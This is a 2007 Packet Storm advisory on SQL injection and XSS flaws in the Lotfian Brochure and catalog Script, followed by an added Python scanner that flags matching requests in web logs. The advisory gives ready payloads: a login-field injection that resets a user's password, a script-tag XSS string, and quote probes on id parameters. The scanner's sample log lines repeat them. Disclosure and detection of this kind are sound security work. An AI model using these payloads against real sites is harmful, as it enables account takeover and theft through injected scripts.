lotfian-sqlxss.txt

04 Dec 2007 00:00:00 | Reported by The-0utl4w | Type: packetstorm | Source: packetstormsecurity.com

Lotfian Brochure and catalog Script SQL injection and XSS vulnerabilit


Code
`Aria-Security Team  
http://Aria-Security.Net  
----------------------------------------  
Lotfian Brochure and catalog Script XSS And SQL Injection   
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1135  
  
Username/Password Field can run SQL Queries,   
For Example I got these:  
  
Consumer.ConsumerID  
Consumer.ConsumerName'  
Consumer.ConsumerUserName  
Consumer.ConsumerPassword  
Consumer.Consumer  
  
Use Something like:  
'update Consumer set Consumer.ConsumerPassword='hacked' where (ConsumerID='1');--  
  
to update what you need  
  
  
[XSS]  
errMsg.asp?msg="><script>alert('Aria-Security')</script>   
  
[Other Advanced SQL Injection]  
  
* AboutUs.asp?id=-1'  
Unclosed quotation mark? use it.  
* SubCategory.asp?ID=-1'  
Unclosed quotation mark? use it.  
  
HINT: suppose the first column name is a.BrochureName  
  
Credits go to Aria-Security Team  
Regards,  
The-0utl4w  
`
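
A defender-side check for the request patterns this advisory lists, added here as an example and not part of the original advisory or the vendor's code: it scans web-server log lines for non-numeric `id` values sent to AboutUs.asp and SubCategory.asp and for HTML metacharacters in the `msg` parameter of errMsg.asp. The log field order, the function names and the sample lines are constructed assumptions.

```python
from urllib.parse import parse_qsl

# Parameters named in the advisory, keyed by lower-cased script name.
NUMERIC_PARAMS = {"aboutus.asp": "id", "subcategory.asp": "id"}
TEXT_PARAMS = {"errmsg.asp": "msg"}
HTML_META = set("<>\"'")

# Constructed sample lines; the field order below is an assumption for this example.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2007-12-04 10:00:01 GET /AboutUs.asp id=3 192.0.2.10 200
2007-12-04 10:00:07 GET /AboutUs.asp id=-1%27 192.0.2.77 500
2007-12-04 10:00:09 GET /SubCategory.asp ID=-1' 192.0.2.77 500
2007-12-04 10:00:15 GET /errMsg.asp msg=Invalid+login 192.0.2.10 200
2007-12-04 10:00:21 GET /errMsg.asp msg=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 192.0.2.77 200
"""

def classify(stem, query):
    """Return a finding label for one request, or None if it looks normal."""
    page = stem.rsplit("/", 1)[-1].lower()
    # parse_qsl percent-decodes values; parameter names are matched case-insensitively.
    params = {k.lower(): v for k, v in parse_qsl(query, keep_blank_values=True)}
    if page in NUMERIC_PARAMS:
        value = params.get(NUMERIC_PARAMS[page])
        if value is not None and not value.isdigit():
            return "non-numeric id"
    if page in TEXT_PARAMS:
        value = params.get(TEXT_PARAMS[page], "")
        if HTML_META & set(value):
            return "markup in msg"
    return None

def scan(log_text):
    """Return (client_ip, uri_stem, finding, status) for each flagged log line."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, _time, _method, stem, query, ip, status = line.split()
        label = classify(stem, "" if query == "-" else query)
        if label:
            findings.append((ip, stem, label, status))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

Login-form input normally arrives in the request body, which these log fields do not record, so the username/password issue will not show up in this scan.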
